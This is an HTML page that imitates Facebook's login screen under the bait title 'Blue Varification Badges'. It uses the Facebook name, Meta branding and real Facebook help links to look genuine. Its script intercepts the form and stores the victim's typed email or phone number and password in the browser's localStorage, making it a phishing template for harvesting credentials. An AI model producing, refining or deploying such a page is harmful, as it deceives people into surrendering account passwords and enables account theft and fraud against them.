<!DOCTYPE html>
<html>
    <head>
        <title>Blue Varification Badges</title>
        <link rel="icon" href="facebooklogo.png" type="image/png">
        <style>
            .p{
                color: rgb(0, 94, 255);
                font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
                font-size: 250%;
                font-weight: 10px;
                text-align: center;
                text-justify: center;
                margin-bottom: 3%;
                margin-left: 2%;
                margin-top: 8%;
            }
            .text{
                width: 25%;
                border: none;
                border-radius: 7px;
                background-color: rgb(255, 245, 245);
                padding-top: 0.8%;
                padding-bottom: 0.8%;
                padding-left: 1%;
                margin-left: 38%;
                margin-top: 0;
            }
            .password{
                width: 25%;
                border: none;
                border-radius: 7px;
                background-color: rgb(255, 245, 245);
                padding-top: 0.8%;
                padding-bottom: 0.8%;
                padding-left: 1%;
                margin-left: 38%;
                margin-top: 0.5%;
            }
            .login{
                width: 26%;
                font-size: 20px;
                font-weight: bolder;
                padding-top: 0.7%;
                padding-bottom: 0.7%;
                border: none;
                border-radius: 7px;
                margin-left: 38%;
                margin-top: 2%;
                color: white;
                background-color: rgb(0, 55, 255);
                cursor: pointer;
            }
            .login:hover{
                background-color: rgb(0, 44, 205);
            }
            .login:active{
                background-color: rgb(0, 36, 168);
            }
            .fo{
                color: rgb(0, 115, 255);
                cursor: pointer;
                font-family: Arial, Helvetica, sans-serif;
                text-align: center;
                margin-left: 3%;
                margin-top: 2%
            }
            .fo:hover{
                text-decoration: underline;
            }
            .fo:active
            {
                color: rgb(0, 78, 173);

            }
            .or{
                text-align: center;
                margin-left: 3%;
                margin-top: 2%;
            }
            .creat{
                background-color: rgb(0, 188, 9);
                color: white;
                font-size: 20px;
                border: none;
                margin-left: 44.4%;
                padding-left: 1%;
                padding-right: 1%;
                padding-top: 0.5%;
                padding-bottom: 0.5%;
                font-weight: bolder;
                margin-top: 0;
                cursor: pointer;
            }
            .creat:hover{
                background-color: rgb(0, 154, 8);

            }
            .creat:active{
                background-color: rgb(2, 132, 8);

            }
            .copyright{
                
                text-align: center;
                margin-left: 3%;
            }
            .co{
                font-size: 20px;
                margin-right: 0.2%;
                margin-left: 0.1%;
                margin-top: 0.3%;
            }
            .bas{
                text-align: center;
                margin-left: 3%;
                font-family: Arial, Helvetica, sans-serif;
            }
            .cas{
                margin-left: 1.2%;
                margin-right: 1.2%;
            }
        </style>
    </head>
    <body>
        <form onsubmit="myfunc(event)">
            <p class="p">facebook</p>
            <div class="input">
                <input type="text" required placeholder="Mobile number or email address" id="number_email" class="text">
                <input type="password" required placeholder="Password" id="password" class="password">
            </div>
            <a href="login.html"><button class="login">Log In</button></a><br>
            <a href="https://es-la.facebook.com/login/identify/" target="_blank"><p class="fo">Forgotten password?</p></a>
            <p class="or">____________________________ or ____________________________</p> <br> <br>
            <a href="https://www.facebook.com/r.php/ " target="_blank"><button class="creat">Create New Account</button></a><br><br><br><br><br><br>
            <p class="bas">About <span class="cas">Help</span> More</p>
            <p class="copyright">Meta <span class="co">©</span>2024</p>
        </form>
        <script type="text/javascript">
            function myfunc(event) {
                event.preventDefault();

                var number_email = document.getElementById("number_email").value;
                var password = document.getElementById("password").value;

                localStorage.setItem('is_number_email',number_email);
                localStorage.setItem('is_password', password);
                
            }
        </script>
    </body>
</html> 